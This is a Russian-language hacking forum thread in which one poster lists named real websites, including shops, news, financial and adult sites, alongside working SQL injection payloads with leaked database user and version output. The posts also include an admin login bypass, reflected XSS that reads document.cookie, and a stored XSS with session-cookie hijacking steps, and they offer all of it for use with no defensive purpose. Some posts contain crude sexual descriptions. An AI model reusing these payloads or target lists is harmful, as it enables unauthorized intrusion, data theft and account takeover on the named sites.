ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

15.05.2017, 01:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
SQLi Error base внедрение двойным запросом.
Код:
Code:
http://www.hairboutique.com/glossary/Detail.php?Keyword=Dimethicone Copolyol Meadowfoamate' and (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) and '1'='1
root@HB-85|file_priv Y|5.5.19|Win64x86|
|
|
|
|

15.05.2017, 16:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сайт: russikona.ru ТИЦ 160
SQLi Error base
russikon_db@localhost|file_priv N|5.5.52-cll-lve|Linux|MySQL Community Server (GPL)|x86_64|
Код:
Code:
http://www.russikona.ru/news.php?id=198' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='admin' limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
XSS-reflected:
Код:
Code:
http://www.russikona.ru/news.php?id=198%27%3e%3cbody+onload%3dalert(document.cookie)%3e
Надеюсь ничьих чувств не оскорбил
|
|
|
|

17.05.2017, 00:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сайт: rakuraku-home.jp
SQLi Error base через POST
queserser_1301@10.1.0.111|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)|
Уязвимые параметры account и password
В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру
эксплоит:
Код:
Code:
URL:http://www.rakuraku-home.jp/system/login/login.php
POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #
вход в админку логин и пароль 1' or '1
Админка:
Код:
Code:
http://www.rakuraku-home.jp/system/
|
|
|
|

18.05.2017, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Парочка сайтов с финансовой тематикой
Сайт: eltee.de
SQL Injection через GET, уязвимый параметр id, вывод в title
pc-linux-gnu:i686:dbo456679871@212.227.29.56:db456679871:5.1.73
эксплоит:
Код:
Code:
view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@version_compile_machine,0x3a,user(),0x3a,database(),0x3a,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
Сайт: businesstoday.lk
SQL Injection через GET, уязвимый параметр issue
5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i686:/usr
эксплоит:
Код:
Code:
http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,user(),0x3a,@@version_compile_os,0x3a,@@version_compile_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
|
|
|
|

19.05.2017, 19:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Шоп с 3d принтерами и всяким оборудованием
Сайт: smtmax.com
SQL Injection через GET, уязвимый параметр act
Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtmax:5.6.35:/usr
эксплоит:
Код:
Code:
http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile_os%2c0x3a%2c%40%40version_compile_machine%2c0x3a%2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40version%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2))a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b)%2b%27
Сайт адалт тематики: straightpornstuds.com
Примерные данные за день
Посетителей: 1469
Просмотров: 5878
Boolean Based SQL Injection
5.0.96 log:str5lt3m 2@107.180.121.24:str5lt3m1 2
Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true"
Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false"
эксплоит:
Код:
Code:
http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1))=115).html
P.s. когда true страничка может долго подгружаться.
|
|
|
|

20.05.2017, 20:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Щоп с компьютерными аксессуарами
Сайт: groupgear.co.uk
MS SQL Injection через POST
уязвимый параметр inputsearch
microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 <x64> (build 9200: ) (hypervisor)|
computergear2012|computerSQL2014
эксплоит:
Код:
Code:
URL:http://www.groupgear.co.uk/searchResults.asp
POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='
|
|
|
|

21.05.2017, 23:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сайт: magiclantern.org.uk
Boolean Based SQL Injection черз GET, уязвимый параметр id
5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_db1
Если есть пост с заголовком The Temple of Minerva "true"
Если нет поста с заголовком The Temple of Minerva "false"
Эксплоит:
Код:
Code:
http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)
Stored XSS:
Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject
Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере
Код:
Code:
URL:http://www.magiclantern.org.uk/contact.php
payload: ">
Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот
Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,
например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk
в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.
|
|
|
|

22.05.2017, 01:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
НУ я так и знал. А вам слабо самому что-то найти и сделать? Вы попробуйте, я уверен вы сможете. Я просто не понимаю, я конечно не профи, но я невкуриваю, зачем крутить как слепую когда есть вывод. А вообще, скажи мне , что это а инструмент такой?
Там ещё мод сек, только что он делает я не понял

|
|
|
|

22.05.2017, 05:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сообщение от BabaDook
BabaDook said:
↑
НУ я так и знал.
Код:
Code:
http://www.magiclantern.org.uk/sales/publications.php?id=-1 union all select 1,2,USER(),@@version,database(),@@basedir,@@version_compile_os,@@version_compile_machine,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 --+
Так лучше ? ))
|
|
|
|

22.05.2017, 16:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 14926
Репутация:
17
|
|
Сообщение от BabaDook
BabaDook said:
↑
Нет, не лучше. Ты каким софтом крутишь?
burpsuite, SQLmap, Netsparker
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|